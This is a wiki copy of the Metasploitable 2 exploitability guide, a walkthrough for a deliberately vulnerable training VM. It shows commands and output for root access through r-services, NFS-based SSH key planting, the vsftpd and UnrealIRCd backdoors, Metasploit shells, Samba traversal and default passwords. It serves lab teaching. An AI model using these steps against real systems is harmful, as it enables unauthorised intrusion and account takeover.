Difference between revisions of "Metasploitable: Exploit Guide"

Revision as of 08:15, 6 February 2020

sumber: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide

Mesin virtual Metasploitable adalah versi Ubuntu Linux yang sengaja dirancang untuk menguji alat keamanan dan menunjukkan kerentanan umum. Versi 2 dari mesin virtual ini tersedia untuk diunduh dan dikirimkan dengan kerentanan lebih banyak daripada image original-nya. Mesin virtual ini kompatibel dengan VMWare, VirtualBox, dan platform virtualisasi umum lainnya. Secara default, antarmuka jaringan Metasploitable terikat dengan NAT dan adapter jaringan Host-only, dan image tersebut tidak boleh terexpose ke jaringan yang berbahaya.

This document outlines many of the security flaws in the Metasploitable 2 image. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.

Getting Started

After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.

msfadmin@metasploitable:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1 
          inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

Services

From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. The following command line will scan all TCP ports on the Metasploitable 2 instance:

root@ubuntu:~# nmap -p0-65535 192.168.99.131

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT
Nmap scan report for 192.168.99.131
Host is up (0.00028s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  unknown
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  unknown
39292/tcp open  unknown
43729/tcp open  unknown
44813/tcp open  unknown
55852/tcp open  unknown
MAC Address: 00:0C:29:9A:52:C1 (VMware)

Nearly every one of these listening services provides a remote entry point into the system. In the next section, we will walk through some of these vectors.

Unix Basics

TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation). To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH.

# rlogin -l root 192.168.99.131
Last login: Fri Jun  1 00:10:39 EDT 2012 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p 192.168.99.131
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  53318  status
    100024    1   tcp  43729  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  46696  nlockmgr
    100021    3   udp  46696  nlockmgr
    100021    4   udp  46696  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  55852  nlockmgr
    100021    3   tcp  55852  nlockmgr
    100021    4   tcp  55852  nlockmgr
    100005    1   udp  34887  mountd
    100005    1   tcp  39292  mountd
    100005    2   udp  34887  mountd
    100005    2   tcp  39292  mountd
    100005    3   udp  34887  mountd
    100005    3   tcp  39292  mountd

root@ubuntu:~# showmount -e 192.168.99.131
Export list for 192.168.99.131:
/ *

Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:

root@ubuntu:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.

root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@ubuntu:~# umount /tmp/r00t

root@ubuntu:~# ssh root@192.168.99.131
Last login: Fri Jun  1 00:29:33 2012 from 192.168.99.128
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

Backdoors

On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it:

root@ubuntu:~# telnet 192.168.99.131 21
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
^]
telnet> quit
Connection closed.

root@ubuntu:~# telnet 192.168.99.131 6200
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)

On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

msfconsole 

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131
msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.99.131:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8bMUYsfmGvOLHBxe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8bMUYsfmGvOLHBxe\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700

id
uid=0(root) gid=0(root)

Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@ubuntu:~# telnet 192.168.99.131 1524
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)

Unintentional Backdoors

In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.

msfconsole

msf > use exploit/unix/misc/distcc_exec
msf  exploit(distcc_exec) > set RHOST 192.168.99.131
msf  exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uk3UdiwLUq0LX3Bi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uk3UdiwLUq0LX3Bi\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

root@ubuntu:~# smbclient -L //192.168.99.131
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk     
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))

root@ubuntu:~# msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf  auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131
msf  auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf  auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*]     \\192.168.99.131\tmp\rootfs\

msf  auxiliary(samba_symlink_traversal) > exit

root@ubuntu:~# smbclient //192.168.99.131/tmp
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average  317.2 KiloBytes/sec)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[..]

Weak Passwords

In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. The primary administrative user msfadmin has a password matching the username. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. At a minimum, the following weak system accounts are configured on the system. Account Name Password

msfadmin

user

postgres

sys

batman

klog

123456789

service

In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. The VNC service provides remote desktop access using the password password.

Vulnerable Web Services

Metasploitable 2 has deliberately vulnerable web applications pre-installed. The web server starts automatically when Metasploitable 2 is booted. To access the web applications, open a web browser and enter the URL http://<IP> where <IP> is the IP address of Metasploitable 2. One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". (Note: A video tutorial on installing Metasploitable 2 is available here.)

In this example, Metasploitable 2 is running at IP 192.168.56.101. Browsing to http://192.168.56.101/ shows the web application home page.

192.168.56/24 is the default "host only" network in Virtual Box. IP address are assigned starting from "101". Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary.

To access a particular web application, click on one of the links provided. Individual web applications may additionally be accessed by appending the application directory name onto http://<IP> to create URL http://<IP>/<Application Folder>/. For example, the Mutillidae application may be accessed (in this example) at address http://192.168.56.101/mutillidae/. The applications are installed in Metasploitable 2 in the /var/www directory. (Note: See a list with command ls /var/www.) In the current version as of this writing, the applications are

   mutillidae (NOWASP Mutillidae 2.1.19)
   dvwa (Damn Vulnerable Web Application)
   phpMyAdmin
   tikiwiki (TWiki)
   tikiwiki-old
   dav (WebDav)

Mutillidae

The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure). Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). If the application is damaged by user injections and hacks, clicking the "Reset DB" button resets the application to its original state.

Tutorials on using Mutillidae are available at the webpwnized YouTube Channel.

Enable hints in the application by click the "Toggle Hints" button on the menu bar:

The Mutillidae application contains at least the following vulnerabilities on these respective pages: Page Vulnerabilities

add-to-your-blog.php

SQL Injection on blog entry SQL Injection on logged in user name Cross site scripting on blog entry Cross site scripting on logged in user name Log injection on logged in user name CSRF JavaScript validation bypass XSS in the form title via logged in username The show-hints cookie can be changed by user to enable hints even though they are not supposed to show in secure mode

arbitrary-file-inclusion.php

System file compromise Load any page from any site

browser-info.php

XSS via referer HTTP header JS Injection via referer HTTP header XSS via user-agent string HTTP header

capture-data.php

XSS via any GET, POST, or Cookie

captured-data.php

XSS via any GET, POST, or Cookie

config.inc*

Contains unencrytped database credentials

credits.php

Unvalidated Redirects and Forwards

dns-lookup.php

Cross site scripting on the host/ip field O/S Command injection on the host/ip field This page writes to the log. SQLi and XSS on the log are possible GET for POST is possible because only reading POSTed variables is not enforced.

footer.php*

Cross site scripting via the HTTP_USER_AGENT HTTP header.

framing.php

Click-jacking

header.php*

XSS via logged in user name and signature The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1

html5-storage.php

DOM injection on the add-key error message because the key entered is output into the error message without being encoded

index.php*

You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value. You can SQL injection the UID cookie value because it is used to do a lookup You can change your rank to admin by altering the UID value HTTP Response Splitting via the logged in user name because it is used to create an HTTP Header This page is responsible for cache-control but fails to do so This page allows the X-Powered-By HTTP header HTML comments There are secret pages that if browsed to will redirect user to the phpinfo.php page. This can be done via brute forcing

log-visit.php

SQL injection and XSS via referer HTTP header SQL injection and XSS via user-agent string

login.php

Authentication bypass SQL injection via the username field and password field SQL injection via the username field and password field XSS via username field JavaScript validation bypass

password-generator.php

JavaScript injection

pen-test-tool-lookup.php

JSON injection

phpinfo.php

This page gives away the PHP server configuration Application path disclosure Platform path disclosure

process-commands.php

Creates cookies but does not make them HTML only

process-login-attempt.php

Same as login.php. This is the action page.

redirectandlog.php

Same as credits.php. This is the action page

register.php

SQL injection and XSS via the username, signature and password field

rene-magritte.php

Click-jacking

robots.txt

Contains directories that are supposed to be private

secret-administrative-pages.php

This page gives hints about how to discover the server configuration

set-background-color.php

Cascading style sheet injection and XSS via the color field

show-log.php

Denial of Service if you fill up the log XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields

site-footer-xss-discusson.php

XSS via the user agent string HTTP header

source-viewer.php

Loading of any arbitrary file including operating system files.

text-file-viewer.php

Loading of any arbitrary web page on the Interet or locally including the sites password files.

Phishing

user-info.php

SQL injection to dump all usernames and passwords via the username field or the password field XSS via any of the displayed fields. Inject the XSS on the register.php page. XSS via the username field

user-poll.php

Parameter pollution GET for POST XSS via the choice parameter Cross site request forgery to force user choice

view-someones-blog.php

XSS via any of the displayed fields. They are input on the add to your blog page.

DVWA

From the DVWA home page: "Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.".

DVWA contains instructions on the home page and additional information is available at Wiki Pages - Damn Vulnerable Web App.

Default username - admin
Default password - password

Information Disclosure

Additionally, an ill-advised PHP information disclosure page can be found at http://<IP>/phpinfo.php. In this example, the URL would be http://192.168.56.101/phpinfo.php. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2.

You can download Metasploitable 2 here.

Referensi

https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide

Pranala Menarik

Metasploitable